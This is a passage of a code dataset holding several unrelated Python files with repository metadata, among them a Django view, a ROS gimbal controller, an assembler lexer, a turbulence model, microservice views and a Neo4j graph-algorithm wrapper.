print(seats)\n\nmain()","repo_name":"simonvbrae/advent-of-code-2020","sub_path":"day5/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72241216167","text":"from django.shortcuts import render\r\nfrom .models import Category\r\n# Create your views here.\r\ndef post(request):\r\n if request.method == \"GET\":\r\n my_category = Category.objects.all()\r\n return render(request, 'category.html', {'category':my_category})\r\n elif request.method == 'POST':\r\n title = request.POST.get('my-title','')\r\n content = request.POST.get('my-content','')\r\n\r\n cg = Category()\r\n cg.title = title\r\n cg.content = content\r\n cg.save()\r\n\r\n return render(request, 'category.html')\r\n","repo_name":"khw7876/timeattacks","sub_path":"Django/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11163461034","text":"import sys\nINF = sys.maxsize\ninput = lambda:sys.stdin.readline().strip()\n\n\n\n'''\n1234 100\n456\n'''\nm = int(input())\nremain = list(map(int, input().split()))\nn = int(input())\nmake = list(map(int, input().split()))\n\nremain.sort()\nmake.sort()\nmade = [0 for i in range(n)] # pipes that have already been made\ndef making(cur, val, goal):\n if cur==n:\n if val==0:\n return INF\n else:\n return val\n if made[cur] == 1:\n return making(cur+1, val, goal)\n if goal==make[cur]:\n made[cur] = 1\n return val+1\n elif goal<make[cur]:\n return making(cur+1, val, goal)\n else:\n return INF\n\n\n\nret = 0\nfor i in range(m):\n for j in range(n):\n ret += making(j, 0, remain[i])\n","repo_name":"as950118/Algorithm","sub_path":"python/Backtracking/2409.py","file_name":"2409.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74638327527","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom mavros_msgs.msg import MountControl\nfrom mavros_msgs.srv import MountConfigure\nfrom gazebo_msgs.srv import GetLinkState\nimport sys\nimport std_msgs.msg\n\nfrom robocup.msg import goal_distance\n\n\ngimbal_pitch_ = -45 #-15 #-60\ngimbal_yaw_ = 0 #0.0\ngimbal_roll_ = 0.0\n\n\n\ndef xy_callback(xy_msg):\n print(\"gimbal tracking\")\n global gimbal_pitch_,gimbal_roll_,gimbal_yaw_,msg\n width_err=xy_msg.x_image_frame-320\n height_err=240-xy_msg.y_image_frame\n print(width_err)\n if abs(width_err)>100:\n gimbal_yaw_=gimbal_yaw_+0.01*width_err\n if abs(height_err)>100:\n gimbal_pitch_=gimbal_pitch_+0.01*height_err\n print(gimbal_pitch_)\n \n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = \"map\"\n msg.mode = 2\n msg.pitch = gimbal_pitch_\n msg.roll = gimbal_roll_\n msg.yaw = gimbal_yaw_\n mountCnt.publish(msg)\n\n rate.sleep()\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n \n rospy.init_node('gimbal_track')\n\n\n\n xy_sub=rospy.Subscriber(\"max_goal_distance\",goal_distance,xy_callback,queue_size=1)\n drone_name=rospy.get_param(\"~drone_name\")\n drone_id= str(rospy.get_param(\"~drone_id\"))\n\n vehicle_type =drone_name\n vehicle_id = drone_id\n\n mountCnt = rospy.Publisher('mavros/mount_control/command', MountControl, queue_size=1)\n \n rate=rospy.Rate(50)\n \n\n cam_pose_pub = rospy.Publisher('cam_pose', PoseStamped, queue_size=1)\n cam_pose = PoseStamped()\n\n\n print(vehicle_type+'_'+vehicle_id+': Gimbal control')\n # while not rospy.is_shutdown():\n msg = MountControl()\n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = \"map\"\n msg.mode = 2\n msg.pitch = gimbal_pitch_\n msg.roll = gimbal_roll_\n msg.yaw = gimbal_yaw_\n mountCnt.publish(msg)\n rospy.spin()\n","repo_name":"hello50505/robocup_zzu","sub_path":"src/robocup/src/gimbal_track.py","file_name":"gimbal_track.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73543035688","text":"# TODO: say where this algorithm came from\n\nfrom __future__ import division, print_function\nimport numpy as np\nfrom PIL import Image\nfrom svgpathtools import *\nimport svgpathtools\nfrom svgpathtools.path import polyline\nfrom svgwrite.mixins import ViewBox\nfrom . 
import Generator\n\nCLOSED_WARNING_ON=False # suppress svgpathtools warning\n\nDEF_COLOR=\"#000000\"\n\nDEF_FREQUENCY = 192\nMIN_FREQUENCY = 5\nMAX_FREQUENCY = 256\n\nDEF_LINE_COUNT = 70\nMIN_LINE_COUNT = 10\nMAX_LINE_COUNT = 200\n\nDEF_AMPLITUDE = 2.0\nMIN_AMPLITUDE = 0.1\nMAX_AMPLITUDE = 5.0\n\nDEF_SPACING = 1.5\nMIN_SPACING = 0.5\nMAX_SPACING = 2.9\n\nDEF_HORIZONTAL_PHASE_SHIFT = 0\nDEF_VERTICAL_PHASE_SHIFT = 0\n\nMIN_POINTS = 5\nBRIGHTNESS_THRESHOLD = 250\n\nclass Squiggle(Generator):\n def __init__(self, img=None, input_path=None, frequency=DEF_FREQUENCY, line_count=DEF_LINE_COUNT, amplitude=DEF_AMPLITUDE, spacing=DEF_SPACING): # TODO: use kwargs\n super().__init__(img, input_path)\n\n self.frequency = frequency\n self.line_count = line_count\n self.amplitude = amplitude\n self.spacing = spacing\n\n def setFrequency(self, frequency):\n self.frequency = np.clip(frequency, MIN_FREQUENCY, MAX_FREQUENCY)\n return self.frequency\n\n def setLineCount(self, line_count):\n self.line_count = np.clip(line_count, MIN_LINE_COUNT, MAX_LINE_COUNT)\n return self.line_count\n\n def setAmplitude(self, amplitude):\n self.amplitude = np.clip(amplitude, MIN_AMPLITUDE, MAX_AMPLITUDE)\n return self.amplitude\n\n def setSpacing(self, spacing):\n self.spacing = np.clip(spacing, MIN_SPACING, MAX_SPACING)\n return self.spacing\n\n def generate(self, color=DEF_COLOR, x_offset=DEF_HORIZONTAL_PHASE_SHIFT, y_offset=DEF_VERTICAL_PHASE_SHIFT, smooth=False, continuous=False):\n squiggles = []\n\n for y in range(0, self.img.height, self.img.height // self.line_count): # self.img.height // self.line_count\n y = (y + y_offset) % self.img.height\n a = 0\n current_line = [] # store bits of the line\n if continuous:\n current_line.append(complex(0, y)) # start the line\n\n for x in np.arange(self.spacing, self.img.width, self.spacing):\n v = np.mean(self.img.getpixel((x, y))) # TODO: downsample image and average chunk!!\n\n #r = (255 - v) / self.line_count * self.amplitude\n r = self.amplitude * (255 - v) / self.line_count\n a += (255 - v) / self.frequency\n\n point = complex(x, y + np.sin(a + x_offset)*r)\n\n if continuous:\n current_line.append(point)\n else:\n if (v < BRIGHTNESS_THRESHOLD or (len(current_line) > 0 and len(current_line) < MIN_POINTS)): # TODO: calculate this with greyscale mask\n current_line.append(point)\n else:\n squiggles.extend(polyline(*current_line))\n current_line = []\n\n current_line_path = polyline(*current_line)\n if smooth and continuous: # TODO: fix smoothing on discontinuous paths\n current_line_path = smoothed_path(current_line_path)\n squiggles.extend(current_line_path)\n\n paths = Path(*squiggles).continuous_subpaths()\n #wsvg(paths, filename=self.output_path, colors=([color]*len(paths)))\n\n #return self.output_path\n return paths\n\nif __name__ == \"__main__\":\n gen = Squiggle()","repo_name":"RobethX/bmplotter","sub_path":"bmplotter/generators/Squiggle.py","file_name":"Squiggle.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30102825614","text":"#! 
/usr/bin/python3\n\nimport ply.lex as lex\nimport math\n\n# once the lexer reaches a DATA token, data is set to True, and \n# subsequent IMM tokens are parsed as data, not immediates.\ntokens = (\n\t'COMMA',\n\t'REG',\n\t'RTYPE',\n\t'ITYPE',\n\t'SHIFT',\n\t'SCOND',\n\t'BCOND',\n\t'JCOND',\n\t'NOT',\n\t'NEG',\n\t'PUSH',\n\t'POP',\n\t'JAL',\n\t'CALL',\n\t'NOP',\n\t'MOVWI',\n\t'FRAME',\n\t'LEAVE',\n\t'IMM',\n\t'LABEL',\n\t'LABEL_DEF',\n\t'COMMENT',\n\t'TEXT',\n\t'DATA',\n\t'STRING'\n\t)\n\ndef t_COMMENT(t):\n\tr'\\#.*'\n\tpass\n\nt_REG = r'\\$(?:1[0-5]|[0-9]|t[0-3]|s[0-3]|a[0-2]|v[0-1]|sp|fp|ra)'\nt_COMMA = r'\\,'\n\n# 2 operation pseudo instructions, increase instruction count by 2.\ndef t_MOVWI(t):\n\t'movwi'\n\tt.lexer.instr_count += 2\n\treturn t\n\t\ndef t_NEG(t):\n\t'neg'\n\tt.lexer.instr_count += 2\n\treturn t\n\ndef t_PUSH(t):\n\t'push'\n\tt.lexer.instr_count += 2\n\treturn t\n\t\ndef t_POP(t):\n\t'pop'\n\tt.lexer.instr_count += 2\n\treturn t\n\t\ndef t_LEAVE(t):\n\t'leave'\n\tt.lexer.instr_count += 3\n\treturn t\n\t\ndef t_FRAME(t):\n\t'frame'\n\tt.lexer.instr_count += 3\n\treturn t\n\t\n# call expands into push, movwi, jal, pop\ndef t_CALL(t):\n\t'call'\n\tt.lexer.instr_count += 7\n\treturn t\n\n# instructions\ndef t_SHIFT(t):\n\tr'lshi|ashui'\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_ITYPE(t):\n\tr'andi|ori|xori|addi|addui|addci|subi|subci|cmpi|movi|muli|lui'\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_RTYPE(t):\n\tr\"and|or|xor|add|addu|addc|sub|subc|cmp|mov|mul|test|lsh|ashu|load|stor\"\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_SCOND(t):\n\tr's(?:eq|ne|ge|cs|cc|hi|ls|lo|hs|gt|le|fs|fc|lt|uc)'\n\tt.value = t.value[1:]\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_BCOND(t):\n\tr'b(?:eq|ne|ge|cs|cc|hi|ls|lo|hs|gt|le|fs|fc|lt|uc)'\n\t# branch needs to know it's memory location to calculate relative jumps.\n\tt.value = (t.value[1:], t.lexer.instr_count)\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_JCOND(t):\n\tr'j(?:eq|ne|ge|cs|cc|hi|ls|lo|hs|gt|le|fs|fc|lt|uc)'\n\tt.value = t.value[1:]\n\tt.lexer.instr_count += 1\n\treturn t\n\t\ndef t_NOT(t):\n\t'not'\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_NOP(t):\n\t'nop'\n\tt.lexer.instr_count += 1\n\treturn t\n\ndef t_JAL(t):\n\t'jal'\n\tt.lexer.instr_count += 1\n\treturn t\n\n# Immediate\ndef t_IMM(t):\n\tr'(?:-?0[xX][a-fA-F0-9]+)|(?:-?[0-9]+)|(?:0[bB][01]+)'\n\tif t.value[0:2].lower() == \"0x\":\n\t\tt.value = int(t.value, 16)\n\telif t.value[0:2].lower() == \"0b\":\n\t\tt.value = int(t.value[2:], 2)\n\telse:\n\t\tt.value = int(t.value, 10)\n\tif t.lexer.data:\n\t\tt.lexer.instr_count += 1\n\t\t# if inside the data segment, immediate values encode to data\n\treturn t\t\n\ndef t_STRING(t):\n\t'\".*\"'\n\tt.value = t.value[1:-1] # strips off the quotation marks.\n\t# Ascii characters are stored 2 to a word, so increase the instruction count\n\t# by 1/2 of the total number of characters (including the null terminator),\n\t# rounded up \n\tt.lexer.instr_count += math.ceil((len(t.value) + 1) / 2)\n\treturn t\n\n# Labels\ndef t_LABEL_DEF(t):\n\tr\"[a-zA-Z][_a-zA-Z0-9]*\\:\"\n\t# on finding a label, add the label and the memory location it points to\n\tlabel = t.value[:len(t.value)-1] # strips :\n\tif label in t.lexer.symbol_table:\n\t\tprint('ERROR: Duplicate label on line', t.lexer.lineno)\n\tt.lexer.symbol_table[label] = t.lexer.instr_count\n\t\nt_LABEL = r'[a-zA-Z][_a-zA-Z0-9]*'\n\n# Keywords\nt_TEXT = r'\\.text'\n\ndef t_DATA(t):\n\tr'\\.data'\n\tt.lexer.data = True\n\treturn t\n\n# Lexer constants\ndef 
t_newline(t):\n\tr'\\n+'\n\tt.lexer.lineno += len(t.value)\n\t\nt_ignore = ' \\t'\n\t\t\ndef t_error(t):\n\tprint('ERROR: Illegal character \"' + t.value + '\" on line', t.lexer.lineno)\n\tt.lexer.skip(1)\n\n# lexing\nlexer = lex.lex()\n# instruction count allows the lexer to track the memory location for labels\nlexer.instr_count = 0\n# symbol table is a dictionary, with labels as keys and memory pointers as values \nsymbol_table = dict()\nlexer.data = False\nlexer.symbol_table = symbol_table\n","repo_name":"yashton/processor","sub_path":"asm/asmlex.py","file_name":"asmlex.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34139638625","text":"\"\"\"\nOffshore Macro-Meteorological Model from:\n\n@article{sadot1992forecasting,\n title={Forecasting optical turbulence strength on the basis of macroscale meteorology and aerosols: models and validation},\n author={Sadot, Dan and Kopeika, Norman S},\n journal={Optical Engineering},\n volume={31},\n number={2},\n pages={200--212},\n year={1992},\n publisher={SPIE}\n}\n\"\"\"\nimport os\nimport sys\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\n\nfrom otbench.benchmark.models.regression.base_model import BaseRegressionModel\nfrom otbench.utils import apply_fried_height_adjustment, add_temporal_hour, add_temporal_hour_weight\n\n\nclass MacroMeteorologicalModel(BaseRegressionModel):\n \"\"\"A model which predicts the Cn2 value using macro-meteorological parameters.\"\"\"\n\n def __init__(self,\n name: str,\n target_name: str,\n timezone: str,\n obs_lat: float,\n obs_lon: float,\n air_temperature_col_name: str,\n humidity_col_name: str,\n wind_speed_col_name: str,\n time_col_name: str,\n temporal_hour_col_name: str = \"temporal_hour\",\n temporal_hour_weight_col_name: str = \"temporal_hour_weight\",\n height_of_observation: Union[float, None] = None,\n enforce_dynamic_range: bool = True,\n constant_adjustment: bool = True,\n use_log10: bool = True,\n **kwargs):\n super().__init__(name, target_name, **kwargs)\n self.timezone = timezone\n self.obs_lat = obs_lat\n self.obs_lon = obs_lon\n self.air_temperature_col_name = air_temperature_col_name\n self.humidity_col_name = humidity_col_name\n self.wind_speed_col_name = wind_speed_col_name\n self.time_col_name = time_col_name\n self.temporal_hour_col_name = temporal_hour_col_name\n self.temporal_hour_weight_col_name = temporal_hour_weight_col_name\n self.height_of_observation = height_of_observation\n self.enforce_dynamic_range = enforce_dynamic_range\n self.constant_adjustment = constant_adjustment\n self.use_log10 = use_log10\n\n def train(self, X: pd.DataFrame, y: Union[pd.DataFrame, pd.Series, np.ndarray]):\n \"\"\"Maintain the same interface as the other models.\"\"\"\n pass\n\n def predict(self, X: pd.DataFrame):\n \"\"\"Generate predictions from the model using an input DataFrame.\"\"\"\n\n # add temporal hour and temporal hour weight\n if self.temporal_hour_col_name not in X.columns:\n X = add_temporal_hour(X,\n name=self.name,\n timezone=self.timezone,\n obs_lat=self.obs_lat,\n obs_lon=self.obs_lon,\n time_col_name=self.time_col_name,\n temporal_hour_col_name=self.temporal_hour_col_name)\n if self.temporal_hour_weight_col_name not in X.columns:\n X = add_temporal_hour_weight(X,\n temporal_hour_col_name=self.temporal_hour_col_name,\n temporal_hour_weight_col_name=self.temporal_hour_weight_col_name)\n\n X_ = X.loc[X[self.air_temperature_col_name].notna() & 
X[self.humidity_col_name].notna() &\n X[self.wind_speed_col_name].notna() & X[self.temporal_hour_weight_col_name].notna()].copy()\n\n T = X_[self.air_temperature_col_name] # temperature in [C]\n T = T + 273.15 # convert to Kelvin\n U = X_[self.wind_speed_col_name] # Wind Speed in [m/s]\n RH = X_[self.humidity_col_name] # Relative Humidity [%]\n W = X_[self.temporal_hour_weight_col_name] # Temporal Hour Weight\n\n w = 3.8e-14 # coefficient for temporal hour weight W\n t = 2e-15 # coefficient for temperature (Kelvin) T\n rh = -2.8e-15 # coefficient for relative humidity RH\n rh2 = 2.9e-17 # coefficient for relative humidity squared RH^2\n rh3 = -1.1e-19 # coefficient for relative humidity cubed RH^3\n u = -2.5e-15 # coefficient for wind speed U\n u2 = 1.2e-15 # coefficient for wind speed squared U^2\n u3 = -8.5e-17 # coefficient for wind speed cubed U^3\n c = -5.3e-13 # final coefficient\n\n mm_prediction = pd.Series((w * W + t * T + rh * RH + rh2 * (RH * RH) + rh3 * (RH * RH * RH) + u * U + u2 *\n (U * U) + u3 * (U * U * U) + c),\n index=X.index,\n name=self.name)\n\n if self.enforce_dynamic_range:\n X[self.name] = mm_prediction\n X.loc[(X[self.wind_speed_col_name] > 10) | ((X[self.air_temperature_col_name] < 9) |\n (X[self.air_temperature_col_name] > 35)) |\n ((X[self.humidity_col_name] < 14) | (X[self.humidity_col_name] > 92)), self.name] = np.nan\n\n mm_prediction = X[self.name].values\n X.drop(columns=[self.name], inplace=True)\n\n if len(mm_prediction[~np.isnan(mm_prediction)]) > 0:\n if self.constant_adjustment & (min(mm_prediction[~np.isnan(mm_prediction)]) < 0):\n constant_adjustment = min(mm_prediction[~np.isnan(mm_prediction)]) * -1\n mm_prediction = mm_prediction + \\\n constant_adjustment + \\\n sys.float_info.epsilon\n else:\n mm_prediction[mm_prediction <= 0] = np.nan\n\n # convert from model reference height to height of observation\n if self.height_of_observation is not None:\n mm_prediction = apply_fried_height_adjustment(cn2=mm_prediction,\n observed=15.0,\n desired=self.height_of_observation)\n\n if self.use_log10:\n return np.log10(mm_prediction)\n return mm_prediction\n","repo_name":"CDJellen/otbench","sub_path":"otbench/benchmark/models/regression/macro_meteorological.py","file_name":"macro_meteorological.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37713895533","text":"import requests\nimport os\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import get_object_or_404\nfrom .my_cb import my_circle_breaker\nfrom .models import User\nfrom .serializers import UserSerializer\nfrom .rabbit import Uses_Q\nfrom datetime import datetime\n\n\norder_url = os.environ.get(\"ORDER_URL\", \"volosatov-order.herokuapp.com\")\norder_cb = my_circle_breaker(3, 60)\nwarranty_cb = my_circle_breaker(3, 60)\n\nclass UserView(APIView):\n def get(self, request):\n users = User.objects.all()\n serializer = UserSerializer(users, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n json_data = request.data\n serializer = UserSerializer(data=json_data)\n if serializer.is_valid(raise_exception=True):\n user_saved = serializer.save()\n return Response(status=201)\n return Response(status=400)\n\n\nclass StoreOrders(APIView):\n def get(self, request, user_id):\n user = get_object_or_404(User, user_uuid=user_id)\n orders = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\", 
http_method='get')\n #orders = requests.get(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\")\n if orders.status_code == 404:\n return Response({'message': f'user with user_uuid {user_id} not found in orders'}, status=404, content_type='application/json')\n if orders.status_code == 503:\n return orders\n return Response(orders.data, content_type=\"application/json\")\n\n\nclass StorePurchase(APIView):\n def post(self, request, user_id):\n user = get_object_or_404(User, user_uuid=user_id)\n json_data = request.data\n model = json_data.get('model')\n size = json_data.get('size')\n #TODO new_order as orders\n new_order = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\", http_method='post', context={\"model\": model, \"size\": size})\n #new_order = requests.post(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\",\n # {\"model\": model, \"size\": size}).json()\n headers = {\"Location\": f\"/{new_order.data.get('orderUid')}\"}\n if new_order.status_code == 404:\n return Response({'message': 'cant create new order'}, status=404, content_type='application/json')\n if new_order.status_code == 503:\n return new_order\n return Response(status=201, headers=headers)\n\n\nclass StoreOrderDetail(APIView):\n def get(self, request, user_id, order_id):\n user = get_object_or_404(User, user_uuid=user_id)\n order_detail = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{user_id}/{order_id}\", http_method='get')\n #order_detail = requests.get(f\"http://{order_url}/api/v1/orders/{user_id}/{order_id}\")\n if order_detail.status_code == 404:\n return Response({'message': f'cant find order with order_id {order_id} '}, status=404, content_type='application/json')\n if order_detail.status_code == 503:\n return order_detail\n return Response(order_detail.data, content_type=\"application/json\")\n\n\nclass StoreRefund(APIView):\n def delete(self, request, user_id, order_id):\n order = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{order_id}\", http_method='delete')\n #order = requests.delete(f\"http://{order_url}/api/v1/orders/{order_id}\")\n if order.status_code == 404:\n return Response({'message': f'cant delete order with order_id {order_id}'}, status=404, content_type='application/json')\n if order.status_code == 503:\n return order\n return Response(status=order.status_code)\n\n\nclass StoreWarranty(APIView):\n def post(self, request, user_id, order_id):\n user = get_object_or_404(User, user_uuid=user_id)\n warranty = warranty_cb.do_request(f\"http://{order_url}/api/v1/orders/{order_id}/warranty\", http_method='post')\n if warranty.status_code == 404:\n return Response({'message': f'cant find warranty on order with order_id {order_id} '}, status=404, content_type='application/json')\n if warranty.status_code == 503:\n #TODO add request to queue order_id user_id datetime.now\n with Uses_Q() as mq:\n mq.send({'time': str(datetime.now()), 'user_id': str(user_id), 'order_id': str(order_id)})\n return Response({'message': f'warranty is unavailable, but your request is on queue'})\n #warranty = requests.post(f\"http://{order_url}/api/v1/orders/{order_id}/warranty\").json()\n\n warranty = warranty.data\n #TODO for req in\n old_results = []\n with Uses_Q() as mq:\n for req in mq.take():\n result = warranty_cb.do_request(f\"http://{order_url}/api/v1/orders/{req.get('order_id')}/warranty\",\n http_method='post')\n req.update(result.data)\n old_results.append(req)\n # include the old results so they are visible in the response\n warranty.update({\"orderUid\": order_id, 'old_results': 
old_results})\n return Response(warranty, content_type=\"application/json\")\n","repo_name":"Sega7Genesis/microservices-Sega7Genesis","sub_path":"service_store/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5928102273","text":"import glob\nimport sqlite3\nimport re\nfrom tools.configs import ConfigsParams\nfrom tools.apptests import AppTests\n\n\nclass Database():\n \"\"\"Class representing a database\"\"\"\n def __init__(self):\n self.name = None\n\n \n def open(self, db_name):\n path_test = glob.glob(db_name)\n if path_test:\n self.name = db_name\n \n\n def select(self, sql, db_name):\n \"\"\"Select commands for sql\"\"\"\n try: \n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n cursor.execute(sql)\n rows = cursor.fetchall()\n return rows\n except Exception as e:\n print(\"[Error]\", e)\n conn.rollback()\n finally:\n conn.close()\n\n def actions(self, sql, db_name):\n \"\"\"for all other sql commands\"\"\"\n try: \n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n except Exception as e:\n print(\"[Error]\", e)\n conn.rollback()\n finally:\n conn.close()\n","repo_name":"NicolasDuquesne2/Entity-finder-Empyrion","sub_path":"tools/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"341580208","text":"class BaseGraph:\n def __init__(self, driver, direction, config=None):\n if config is None:\n config = {}\n\n self.driver = driver\n self.direction = direction\n self.node_label = config.get(\"node_label\", \"Node\")\n self.relationship_type = config.get(\"relationship_type\", \"CONNECTED\")\n self.graph = config.get(\"graph\", \"heavy\")\n self.identifier_property = config.get(\"identifier_property\", \"id\")\n\n add_node_query = \"\"\"\\\n MERGE (:`%s` {`%s`: {value} })\n \"\"\"\n\n def add_node(self, value):\n with self.driver.session() as session:\n query = self.add_node_query % (self.node_label, self.identifier_property)\n session.run(query, {\"value\": value})\n\n add_nodes_query = \"\"\"\\\n UNWIND {values} AS value\n MERGE (:`%s` {`%s`: value })\n \"\"\"\n\n def add_nodes_from(self, values):\n with self.driver.session() as session:\n query = self.add_nodes_query % (self.node_label, self.identifier_property)\n session.run(query, {\"values\": values})\n\n add_edge_query = \"\"\"\\\n MERGE (node1:`%s` {`%s`: {node1} })\n MERGE (node2:`%s` {`%s`: {node2} })\n MERGE (node1)-[:`%s`]->(node2)\n \"\"\"\n\n def add_edge(self, node1, node2):\n with self.driver.session() as session:\n query = self.add_edge_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.relationship_type\n )\n session.run(query, {\"node1\": node1, \"node2\": node2})\n\n add_edges_query = \"\"\"\\\n UNWIND {edges} AS edge\n MERGE (node1:`%s` {`%s`: edge[0] })\n MERGE (node2:`%s` {`%s`: edge[1] })\n MERGE (node1)-[:`%s`]->(node2)\n \"\"\"\n\n def add_edges_from(self, edges):\n with self.driver.session() as session:\n query = self.add_edges_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.relationship_type\n )\n session.run(query, {\"edges\": [list(edge) for edge in edges]})\n\n number_of_nodes_query = \"\"\"\\\n MATCH (:`%s`)\n RETURN count(*) AS numberOfNodes\n 
\"\"\"\n\n def number_of_nodes(self):\n with self.driver.session() as session:\n query = self.number_of_nodes_query % self.node_label\n return session.run(query).peek()[\"numberOfNodes\"]\n\n betweenness_centrality_query = \"\"\"\\\n CALL algo.betweenness.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, centrality\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, centrality\n \"\"\"\n\n def betweenness_centrality(self):\n with self.driver.session() as session:\n query = self.betweenness_centrality_query % self.identifier_property\n params = self.base_params()\n result = {row[\"node\"]: row[\"centrality\"] for row in session.run(query, params)}\n return result\n\n closeness_centrality_query = \"\"\"\\\n CALL algo.closeness.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n improved: {wfImproved},\n graph: {graph}\n })\n YIELD nodeId, centrality\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, centrality\n \"\"\"\n\n def closeness_centrality(self, wf_improved=True):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"wfImproved\"] = wf_improved\n query = self.closeness_centrality_query % self.identifier_property\n\n result = {row[\"node\"]: row[\"centrality\"] for row in session.run(query, params)}\n return result\n\n harmonic_centrality_query = \"\"\"\\\n CALL algo.closeness.harmonic.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, centrality\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, centrality\n \"\"\"\n\n def harmonic_centrality(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.harmonic_centrality_query % self.identifier_property\n result = {row[\"node\"]: row[\"centrality\"] for row in session.run(query, params)}\n return result\n\n pagerank_query = \"\"\"\\\n CALL algo.pageRank.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph},\n iterations: {iterations},\n dampingFactor: {dampingFactor}\n })\n YIELD nodeId, score\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, score\n \"\"\"\n\n def pagerank(self, alpha, max_iter):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"iterations\"] = max_iter\n params[\"dampingFactor\"] = alpha\n\n query = self.pagerank_query % self.identifier_property\n result = {row[\"node\"]: row[\"score\"] for row in session.run(query, params)}\n return result\n\n triangle_count_query = \"\"\"\\\n CALL algo.triangleCount.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, triangles, coefficient\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, triangles, coefficient\n \"\"\"\n\n def triangles(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.triangle_count_query % self.identifier_property\n result = {row[\"node\"]: row[\"triangles\"] for row in session.run(query, params)}\n return result\n\n def clustering(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.triangle_count_query % self.identifier_property\n result = {row[\"node\"]: row[\"coefficient\"] for row in session.run(query, params)}\n return result\n\n triangle_query = \"\"\"\\\n CALL algo.triangleCount({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph},\n write: false\n })\n \"\"\"\n\n def average_clustering(self):\n with 
self.driver.session() as session:\n params = self.base_params()\n query = self.triangle_query\n result = session.run(query, params)\n return result.peek()[\"averageClusteringCoefficient\"]\n\n lpa_query = \"\"\"\\\n CALL algo.labelPropagation.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, label\n MATCH (n) WHERE id(n) = nodeId\n RETURN label, collect(n.`%s`) AS nodes\n \"\"\"\n\n def label_propagation(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.lpa_query % self.identifier_property\n\n for row in session.run(query, params):\n yield set(row[\"nodes\"])\n\n shortest_path_query = \"\"\"\\\n MATCH (source:`%s` {`%s`: {source} })\n MATCH (target:`%s` {`%s`: {target} })\n CALL algo.shortestPath.stream(source, target, {propertyName}, {\n direction: {direction},\n graph: {graph}\n }) \n YIELD nodeId, cost\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, cost\n \"\"\"\n\n def shortest_weighted_path(self, source, target, weight):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"source\"] = source\n params[\"target\"] = target\n params[\"propertyName\"] = weight\n\n query = self.shortest_path_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.identifier_property\n )\n\n result = [row[\"node\"] for row in session.run(query, params)]\n return result\n\n def shortest_path(self, source, target):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"source\"] = source\n params[\"target\"] = target\n params[\"propertyName\"] = None\n\n query = 